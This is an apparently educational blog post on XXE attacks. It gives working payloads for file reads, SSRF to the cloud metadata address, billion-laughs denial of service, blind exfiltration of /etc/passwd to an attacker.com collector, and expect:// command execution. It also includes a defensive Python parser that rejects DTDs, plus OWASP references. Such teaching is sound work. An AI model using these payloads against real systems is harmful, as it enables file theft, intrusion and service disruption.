XXE

Posted by D on January 13, 2020

XML & DTD quick intro

What is XML

  • eXtensible Markup Language
  • Structured syntax
  • Designed to be human readable as well as machine readable

example:

<?xml version = "1.0" encoding = "utf-8"?>
<plane>
	<year> 1977 </year>
	<make> Cessna </make>
</plane>

DTD

  • Document Type Definition
  • Used for defining XML document structure
  • Can also be defined outside of the XML file (external DTD)

<!DOCTYPE root-element [element-declarations]>

Types of entities:

  • Internal entity
    <!ENTITY foo "bar">
    

    This entity can be referenced within the XML as &foo; and it will be replaced with the term “bar”.

  • External entity
    <!ENTITY foo SYSTEM "file:///external.dtd">
    

    We are mostly interested in external entities.

  • Parameter entity
    <!ENTITY % name "entity_value">
    

    Declared and referenced with the % symbol

Introduction to XXE

Types of attacks

1. Classic XXE

example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo[<!ENTITY xxe "thisistest">]>
<userInfo>
	<firstName>John</firstName>
	<lastName>&xxe;</lastName>
</userInfo>

Output:
Hello John thisistest

This is not a vulnerability yet!

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo[<!ENTITY xxe SYSTEM  "file:///etc/passwd">]>
<userInfo>
	<firstName>John</firstName>
	<lastName>&xxe;</lastName>
</userInfo>

Output:
Hello John root:x:0:0:root
...
....[SNIP]

Now it is.

2. Server-Side Request Forgery

example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo[<!ENTITY xxe SYSTEM  "http://169.254.169.254">]>
<userInfo>
	<firstName>John</firstName>
	<lastName>&xxe;</lastName>
</userInfo>

Output:
Hello John 1.0
2007-01-09
2007-03-01
...
....[SNIP]

3. Denial of Service (the "billion laughs" entity expansion)

example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]>
<lolz>&lol9;</lolz>

4. Advanced XXE

example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data[<!ENTITY % remote SYSTEM "http://attacker.com/call.dtd">%remote;]>

Parameter entities are a special type of entity that can only be used within the DTD itself. Tip: use this payload to check for XXE vulnerabilities when user input is not reflected back on the page or in the response.

  • Also known as Blind XXE
  • Out-of-band data exfiltration. The payload to upload/send:

<!DOCTYPE roottag[
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/host.dtd">
%dtd;]>
<roottag>&send;</roottag>

Content of host.dtd:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/collect.php?file=%file;'>">
%all;

5. Remote Code Execution

In some rare cases XXE can be elevated to executing system commands on the server: expect:// awesomeness! expect:// is a PHP stream wrapper that gives access to a spawned process's stdin, stdout and stderr. In short, it can execute commands, but only where the (non-default) PHP expect extension is installed. Sample payload:

<!DOCTYPE replace [<!ENTITY ent SYSTEM "expect://whoami"> ]>

https://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7
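Every payload above (file read, SSRF, billion laughs, blind exfiltration, expect://) needs a DOCTYPE, so the cleanest defence, and the one the OWASP cheat sheet recommends, is to refuse DTDs in untrusted input outright. This is an added example, not code from the original post: a stdlib-only Python intake parser built on `xml.parsers.expat` that does exactly that, run over constructed sample documents; `parse_untrusted_xml`, `accepts` and the `attacker.example` host are my own names.

```python
import xml.parsers.expat


class DtdRejected(Exception):
    """Raised when untrusted XML carries a DOCTYPE or an entity declaration."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse with no DTD processing; returns {tag: text} for every element."""
    parser = xml.parsers.expat.ParserCreate()
    result, stack = {}, []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fires before the internal subset is read, so no entity is ever declared.
        raise DtdRejected(f"DOCTYPE {name!r} refused in untrusted input")

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        raise DtdRejected(f"entity {name!r} refused")  # defence in depth

    def on_external_ref(context, base, system_id, public_id):
        return 0  # never fetch file:// or http:// targets; expat aborts instead

    def start(tag, attrs):
        stack.append(tag)
        result.setdefault(tag, "")

    def chars(text):
        result[stack[-1]] += text

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = start
    parser.EndElementHandler = lambda tag: stack.pop()
    parser.CharacterDataHandler = chars
    parser.Parse(data, True)
    return result


def accepts(data: bytes) -> bool:
    """True if the document parsed cleanly, False if rejected as DTD-bearing."""
    try:
        parse_untrusted_xml(data)
        return True
    except DtdRejected:
        return False


# Constructed samples (not from the post): a benign document and the payload shapes above.
BENIGN = b'<?xml version="1.0"?><userInfo><firstName>John</firstName><lastName>Doe</lastName></userInfo>'
CLASSIC = b'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><userInfo><lastName>&xxe;</lastName></userInfo>'
BLIND = b'<?xml version="1.0"?><!DOCTYPE data [<!ENTITY % remote SYSTEM "http://attacker.example/call.dtd">%remote;]><data/>'
LAUGHS = b'<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol1 "&lol;&lol;&lol;">]><lolz>&lol1;</lolz>'
```

The benign document comes back as a plain dict; the three payloads are rejected at the DOCTYPE before any entity is declared, so neither /etc/passwd nor the remote DTD is ever touched.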

Common places to find XXE

  • XML file upload (e.g. config files)
  • XML input fields
  • XML-based APIs
  • XML-based files (RSS, SVG)

Uncommon places to find XXE

  • MS Office files (docx, xlsx, etc.)
  • SAML-based SSO
  • VoiceXML in IVR systems
  • Online map editors using KML

Tools

  • Xxeserv: a mini webserver with FTP support for XXE payloads

  • oxml_xxe: a tool for embedding XXE/XML exploits into different file types

Labs

https://github.com/jbarone/xxelab

Resource and References

https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html
https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
https://github.com/jbarone/xxelab
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
